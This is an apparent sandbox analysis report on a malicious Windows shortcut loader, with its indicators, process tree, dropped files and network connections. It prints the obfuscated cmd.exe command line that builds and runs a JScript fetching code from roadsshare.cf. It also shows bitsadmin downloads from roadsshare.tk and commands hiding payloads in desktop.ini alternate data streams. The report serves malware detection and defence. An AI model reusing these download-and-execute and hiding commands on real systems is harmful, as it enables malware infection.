File name: Arquivo514_04_10_2019.lnk
Full analysis: https://app.any.run/tasks/a5434c8c-cb8a-4f17-80f1-9fbe8c39855d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 09, 2019, 15:28:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=18, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized
MD5: FAC12693F40F950710681EB125E1058C
SHA1: 223E49D34DCB8366046181E308150BC54F9B3788
SHA256: E925B17F09C667D4FEBEE88FEBA066C2DD80AE4148DB7B65968BC79C62FAF0A0
SSDEEP: 24:8aS37Dpd9Q2CzA6Y+/qiCwBIDnQgRY0j6XZUN84o0w5vZ4O1BrTI:8aSrD3n0VBu0Qo/x4OX0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Changes settings of System certificates
      • WScript.exe (PID: 2476)
    • Uses BITSADMIN.EXE for downloading application
      • WScript.exe (PID: 2476)
    • Loads dropped or rewritten executable
      • SearchProtocolHost.exe (PID: 1676)
      • ExtExport.exe (PID: 2328)
  • SUSPICIOUS
    • Executed via COM
      • explorer.exe (PID: 3572)
    • Executes scripts
      • explorer.exe (PID: 3572)
    • Starts CMD.EXE for command execution
      • cmd.exe (PID: 2724)
      • WScript.exe (PID: 2476)
      • ExtExport.exe (PID: 2328)
    • Creates files in the user directory
      • WScript.exe (PID: 2476)
    • Adds / modifies Windows certificates
      • WScript.exe (PID: 2476)
    • Executable content was dropped or overwritten
      • cmd.exe (PID: 2496)
      • cmd.exe (PID: 2552)
      • cmd.exe (PID: 3732)
      • cmd.exe (PID: 3088)
      • cmd.exe (PID: 3960)
  • INFO
    • No info indicators.
No Malware configuration.

TRiD: .lnk | Windows Shortcut (100)

EXIF (LNK)

MachineID: jumper-pc
IconFileName: %SystemRoot%\system32\imageres.dll
CommandLineArguments: /V /D /c "sEt SRM=%wYDIIindYDIIir%YDII\eYDIIXPYDIILoRYDIIeRYDII /cYDII,&&Set RZE=GeJDCWtOJDCWbjJDCWecJDCWt(JDCW'sJDCWcriJDCWpt:JDCWhttJDCWps:JDCW&&SEt hx76c22=KVIKVIroadsshare.cfKVI?07KVI') 2>&1 && sET/^p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" <nul > %UserPROfile%\m7Ye4i4.Js 2>&1 2>&1|call %SRM:YDII=% %UserProfile%\m7Ye4i4.jS 2>&1|e^xi^T"
RelativePath: .\Windows\System32\cmd.exe
Description: gfjc
LocalBasePath: C:\Windows\System32\cmd.exe
VolumeLabel: -
DriveType: Fixed Disk
TargetFileDOSName: cmd.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 18
TargetFileSize: 302592
ModifyDate: 2010:11:21 04:24:03+01:00
AccessDate: 2010:11:21 04:24:03+01:00
CreateDate: 2010:11:21 04:24:03+01:00
FileAttributes: Archive
Flags: IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString
No data.
Total processes: 124
Monitored processes: 52
Malicious processes: 4
Suspicious processes: 1

Behavior graph

Interactive graph (available in the full report). Process nodes in graph order; "no specs" marks nodes for which the graph shows no detailed specification:
start cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs explorer.exe no specs explorer.exe no specs wscript.exe bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs cmd.exe no specs cmd.exe searchprotocolhost.exe no specs cmd.exe cmd.exe cmd.exe cmd.exe no specs extexport.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs shutdown.exe no specs shutdown.exe no specs shutdown.exe no specs shutdown.exe no specs shutdown.exe no specs shutdown.exe no specs timeout.exe no specs cmd.exe no specs

Process information

Columns: PID | CMD | Path | Parent process (the Indicators column of the original table holds only icons and is omitted)

PID: 2724
CMD: "C:\Windows\System32\cmd.exe" /V /D /c "sEt SRM=%wYDIIindYDIIir%YDII\eYDIIXPYDIILoRYDIIeRYDII /cYDII,&&Set RZE=GeJDCWtOJDCWbjJDCWecJDCWt(JDCW'sJDCWcriJDCWpt:JDCWhttJDCWps:JDCW&&SEt hx76c22=KVIKVIroadsshare.cfKVI?07KVI') 2>&1 && sET/^p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" <nul > C:\Users\admin\m7Ye4i4.Js 2>&1 2>&1|call %SRM:YDII=% C:\Users\admin\m7Ye4i4.jS 2>&1|e^xi^T"
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2580
CMD: C:\Windows\system32\cmd.exe /S /D /c" sET/p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" 0<nul 1>C:\Users\admin\m7Ye4i4.Js 2>&1"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3596
CMD: C:\Windows\system32\cmd.exe /S /D /c" call %SRM:YDII=% C:\Users\admin\m7Ye4i4.jS 2>&1"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3700
CMD: C:\Windows\system32\cmd.exe /S /D /c" exiT"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 1452
CMD: C:\Windows\eXPLoReR /c, C:\Users\admin\m7Ye4i4.jS
Path: C:\Windows\explorer.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3572
CMD: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Path: C:\Windows\explorer.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2476
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\m7Ye4i4.Js"
Path: C:\Windows\System32\WScript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 1073807364
Version: 5.8.7600.16385

PID: 2128
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer 52298 /priority foreground https://roadsshare.tk/07/landoqeahjkya.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkya.jpg
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: BITS administration utility
Exit code: 0
Version: 7.5.7600.16385 (win7_rtm.090713-1255)

PID: 3472
CMD: "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg" > "C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpg"&&erase "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg"
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 1404
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer 85686 /priority foreground https://roadsshare.tk/07/landoqeahjkyb.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkyb.jpg
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: BITS administration utility
Exit code: 0
Version: 7.5.7600.16385 (win7_rtm.090713-1255)
Total events: 469
Read events: 427
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 5
Suspicious files: 9
Text files: 4
Unknown types: 1

Dropped files

Columns: PID | Process | Filename | Type

2748 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkydx.gif | binary
MD5: 6EA0310A175387E161817502FA576641
SHA256: E85954435FE1FE9CB5C042BD035513111D07F3ED41DA5B8D61E3D0C1A42C7C23

2476 | WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\roadsshare_cf[1].txt | xml
MD5: 92A4E2E27AD2694E8D6CB5170F7DAC1B
SHA256: 60FB36DEE00FDACA3FAA840863F22B12B38B25D3E52FF3548943846E8BD4F4C9

1636 | cmd.exe | C:\Users\Public\Libraries\trust\r1.log | text
MD5: DEE3DF2742A5AA5662ABF8637AC87A3A
SHA256: A368E5B71B293DB268F0B2981163333874EEFD26721E13645557B83C1CBC1E76

2848 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyi.gif | binary
MD5: 176B1DC2B5059B6704E1B35E3EDCC62D
SHA256: 26B0095DFF7C50AE12F165A62B4BA954520B60E54D923432213D92AD8090D412

2496 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyxa.~ | executable
MD5: D336F1B6EAAF81FDA7366C91FB050108
SHA256: 8D1AEF50A85D87063F2BD05FBD782111B14F0467FED70D8E5DFB86B6F61E6D09

3692 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyxb.~ | binary
MD5: 36F60D673EE6E65C8EEC16059B9ED634
SHA256: 17921585FADF23A31A0FFA7991878B614119A0105679FC1339AD2EFD745C35B1

3472 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpg | binary
MD5: 57BBFB7DFBD710AAEF209BFF71B08A32
SHA256: 66C9C650E26635BF9E205E0EBB7B149A69A25F002917A1F9C5360149D423B30E

2476 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@roadsshare[1].txt | text
MD5: E247EEAB9CF342F02D15883BDCB2E717
SHA256: B0A6B92EC436206029D8E81D777097E3B4A3B3C27DCE914542A1AA423E492590

2484 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyc.jpg | binary
MD5: 731CE6815B16DA24A9B41261C9C4CB35
SHA256: 40939CAF1D074EE825A2E1943F99D50AD6258C70612FA5F345FA35170A3D1BD1

3020 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkygx.gif | binary
MD5: 4959533361EF3FD46F430D7F8F3411CA
SHA256: F42DD164EB8772BCE7B9DB81CEA30726DE4270961EFFA1EF582A0BD8539CA12B
HTTP(S) requests: 0
TCP/UDP connections: 3
DNS requests: 2
Threats: 0

HTTP requests

No HTTP requests

Connections

Columns: PID | Process | IP | Domain | ASN | CN | Reputation
n/a | n/a | 104.28.15.78:443 | roadsshare.tk | Cloudflare Inc | US | unknown
2476 | WScript.exe | 104.27.131.120:443 | roadsshare.cf | Cloudflare Inc | US | shared
2476 | WScript.exe | 104.27.130.120:443 | roadsshare.cf | Cloudflare Inc | US | shared

DNS requests

Columns: Domain | IP | Reputation
roadsshare.cf | 104.27.131.120, 104.27.130.120 | suspicious
roadsshare.tk | 104.28.15.78, 104.28.14.78 | suspicious

Threats

Columns: PID | Process | Class | Message
n/a | n/a | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .cf Domain
2476 | WScript.exe | Potentially Bad Traffic | ET INFO Suspicious Domain (*.cf) in TLS SNI
n/a | n/a | Potentially Bad Traffic | ET DNS Query to a .tk domain - Likely Hostile
No debug info